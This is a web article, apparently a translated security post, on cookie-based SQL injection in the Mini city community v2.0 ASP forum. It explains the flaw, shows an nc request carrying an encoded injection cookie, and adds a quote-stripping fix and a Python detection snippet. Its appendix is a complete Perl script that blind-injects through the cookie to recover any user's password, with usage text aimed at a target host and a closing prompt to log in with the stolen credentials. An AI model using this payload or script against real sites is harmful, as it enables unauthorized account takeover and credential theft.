SQL injection Using Cookies

Source: Internet
Author: User
Tags: perl script

http://www.spking.com/mix/

SQL injection vulnerabilities are common in ASP programs. Usually they are exploited by submitting carefully crafted addresses from the browser's address bar, but SQL injection can also be carried out through cookies. The vulnerability described here is in the free version of Mini community v2.0 + SP1 patch.

The Mini city community has a large number of problem files, so a simple one, user_photo.asp, is chosen here for explanation.

The user_photo.asp file uploads the user's profile picture. First, let's look at how the file checks that the user has logged in:


If Request.Cookies("NC") = "" or Request.Cookies("NC") = "guest" then
    Response.Write("Sorry, you are not a community user. Please register first!")
    Response.End
End if


Here it simply checks that the value of NC in the cookie is non-empty and not "guest" to decide that the user is logged in. This is the first mistake: the user is trusted on the strength of a cookie value alone, with no password checked against the database. Next, let's look at the code that follows:


Set rs = Server.CreateObject("ADODB.Recordset")
Set rs = conn.Execute("Select * from HY Where NC='" & Request.Cookies("NC") & "'")


These two lines are the second error: whatever data comes from Request.Cookies("NC") is put straight into the SQL statement without any filtering. By constructing the cookie, SQL injection is possible here!


' ... some code omitted ...

... width="200" height="150">


In the code that follows, user_photo_disp.asp is called to display the image based on the data returned by the query above. If the query succeeds, the image is displayed normally (Figure 1); otherwise an error is shown. This difference lets us tell whether a constructed SQL statement was correct or not.


Figure 1

A brief review of the three analysis steps above, which are also the prerequisites for any SQL injection vulnerability to exist:
1. The ASP program keeps running when a statement fails, without damaging the data we rely on.
2. We can control the composition of the SQL statement and insert the SQL components we need.
3. We can tell from the data returned to the client (browser) whether the SQL statement executed correctly.

With the vulnerability analysis complete, here is a simple practice process. Because of the way cookies are handled, exploitation is usually a brute-force guess. NC (the "Swiss Army knife" of the Internet) is used to demonstrate the process, and a Perl script written by the author that can guess any account's password is attached at the end; first register a user named goo.

Detailed usage of Nc.exe can be found on the Internet, so it is not repeated here. Run nc -vv 127.0.0.1 80 < 1.txt > 1.htm at the command line. The contents of 1.txt are constructed as follows; note that there are three carriage returns after the last semicolon.

GET /mcity/main.asp HTTP/1.0
Host: 127.0.0.1
Cookie: NC=goo%27and%20exists(select%20id%20from%20HY%20where%20len(MM)%3D7%20and%20NC%3D%27admin%27)%20and%20%271;


Substituting the NC cookie data into the SQL statement shows what actually executes:
Select * from HY Where NC='goo' and exists (select id from HY where len(MM)=7 and NC='admin') and '1'

Obviously, this checks whether the password of the user admin has length 7. Other SQL statements can be constructed along the same lines. In 1.txt, = (equal sign) is written as %3D, ' (single quote) as %27, and spaces as %20. If the statement is true, the browser returns the image (Figure 2).


Figure 2

In fact, when I tested the official Mini city community site I found that most of the SQL injection vulnerabilities had already been fixed, but no patch had been released. Anyone running this community has to fix it themselves: replace every place where Request is used with the form Replace(Request.Cookies("NC"), "'", "") so that single quotes are removed, which makes the vulnerability harder to exploit. It is still a good solution to this problem.
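As an added example (not code from the original article), the following Python reproduces how user_photo.asp splices the decoded NC cookie into its SQL text, applies the Replace()-style fix suggested above, and flags cookie values that a plain username should never contain; the keyword list and the sample cookies are my own constructions, built from the request shown earlier.

```python
# Added example, not code from the original article: it reproduces how
# user_photo.asp splices the NC cookie into its SQL text, applies the
# Replace()-style fix the article suggests, and flags cookie values that
# should never occur for a plain username. Sample cookies are constructed.
import re
from urllib.parse import unquote


def build_query(nc_cookie: str) -> str:
    """Vulnerable pattern: decoded cookie concatenated straight into SQL."""
    return "Select * from HY Where NC='" + unquote(nc_cookie) + "'"


def strip_quotes(value: str) -> str:
    """The article's mitigation: remove single quotes before concatenation."""
    return unquote(value).replace("'", "")


def build_query_fixed(nc_cookie: str) -> str:
    """Same query after the mitigation; the value can no longer close the literal."""
    return "Select * from HY Where NC='" + strip_quotes(nc_cookie) + "'"


# A username cookie has no business decoding to quotes, comment markers,
# parentheses or SQL keywords; this is what a WAF rule or log scan looks for.
# The keyword list is an assumption chosen to cover the payload in this article.
SUSPICIOUS = re.compile(
    r"'|--|;|\(|\b(and|or|exists|select|len|left|union)\b", re.IGNORECASE)


def is_injection_attempt(nc_cookie: str) -> bool:
    return SUSPICIOUS.search(unquote(nc_cookie)) is not None


# Constructed samples: the cookie from the request shown above, and a normal login.
SAMPLES = {
    "attack": "goo%27and%20exists(select%20id%20from%20HY%20where%20len(MM)"
              "%3D7%20and%20NC%3D%27admin%27)%20and%20%271",
    "benign": "goo",
}


def scan(samples: dict) -> dict:
    """Map each sample name to whether its cookie looks like an injection."""
    return {name: is_injection_attempt(c) for name, c in samples.items()}


if __name__ == "__main__":
    for name, cookie in SAMPLES.items():
        print(name, "->", build_query(cookie))
        print("   flagged:", is_injection_attempt(cookie))
        print("   after fix:", build_query_fixed(cookie))
```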

 

Appendix:

#!/usr/bin/perl
# Codz By Mix 2003/8/15
# The script can crack MINI system users' passwords

$| = 1;
use Socket;
use Getopt::Std;
getopt('hpwu');

print "============================================================\n";
print "The Script Codz By Mix\n";
print "============================================================\n";

&usage unless (defined($opt_h) && defined($opt_w));

$host     = $opt_h;
$port     = $opt_p || 80;
$way      = $opt_w;
$username = $opt_u;

print "Please wait...\n";

# Step 1: find the password length by testing len(MM) = 0 .. 20
@dic = (0 .. 20);
for ($i = 0; $i < @dic; $i++)
{
    $cookies = "NC=goo%27and%20exists(select%20id%20from%20HY%20where%20len(MM)%3D$dic[$i]%20and%20NC%3D%27$username%27)%20and%20%271";
    $request = "GET $way HTTP/1.0\n" .
               "Host: $host\n" .
               "Cookie: $cookies;\n\n\n";
    print "$dic[$i].";
    @in  = sendraw($request);
    @num = grep /the image can be/, @in;
    $size = @num;
    if ($size > 0) {
        $len = $dic[$i];
        print "\nSuccessful, The len of admin's password is $dic[$i].\n";
        last;
    }
}

# Step 2: recover the password one character at a time with left(MM, $j)
for ($j = 1; $j <= $len; $j++)
{
    @dic11   = (0 .. 9);
    @dic12   = ('a' .. 'z');
    @dic13   = ('A' .. 'Z');
    # special characters, already URL-encoded where needed (%25 %26 %2b)
    @special = ("'", '~', '!', '@', '#', '$', '%25', '^', '%26', '*', '(', ')',
                '_', '%2b', '=', '-', '{', '}', '[', ']', ':', '"', ';', '<',
                '>', '?', '|', ',', '.', '/', '\\');
    @dic     = (@dic11, @dic12, @dic13, @special);
    for ($i = 0; $i < @dic; $i++)
    {
        $key     = $pws . $dic[$i];
        $cookies = "NC=goo%27and%20exists%20(select%20id%20from%20HY%20where%20left(MM,$j)%3D%27$key%27%20and%20NC%3D%27$username%27)%20and%20%271";

        $request = "GET $way HTTP/1.0\n" .
                   "Host: $host\n" .
                   "Cookie: $cookies;\n\n\n";
        print "$dic[$i].";
        @in  = sendraw($request);
        @num = grep /the image can be/, @in;
        $size = @num;
        if ($size > 0) {
            $th = $j . "th";
            print "\nSuccessful, The $th word of the password is $dic[$i]\n";
            $pws = $pws . $dic[$i];
            last;
        }
    }
}

# decode the URL-encoded special characters back to their literal form
$pws =~ s/\%2b/+/ig;
$pws =~ s/\%25/%/ig;
$pws =~ s/\%26/&/ig;
print "Successful, The $username's password is $pws.\n";

print "Now, you can use username: $username password: $pws to login!\n";

sub usage {
    print qq~
Usage: $0 -h <host> [-p <port>] -w <path> [-u <user>]
 -h = hostname you want to crack
 -p = port, 80 default
 -w = the path of the weak file
 -u = the user name you want to crack

Eg: $0 -h www.target.com -p 80 -w /mcity/user_photo.asp -u admin
~;
    exit;
}

# Thanx rfp's sendraw
sub sendraw {
    my ($request) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems\n");
    socket(S, PF_INET, SOCK_STREAM, getprotobyname('tcp') || 0) || die("Socket problems\n");
    if (connect(S, pack "SnA4x8", 2, $port, $target)) {
        select(S);
        $| = 1;
        print $request;
        my @in = <S>;
        select(STDOUT);
        close(S);
        return @in;
    }
    else {
        die("Can't connect...\n");
    }
}

 
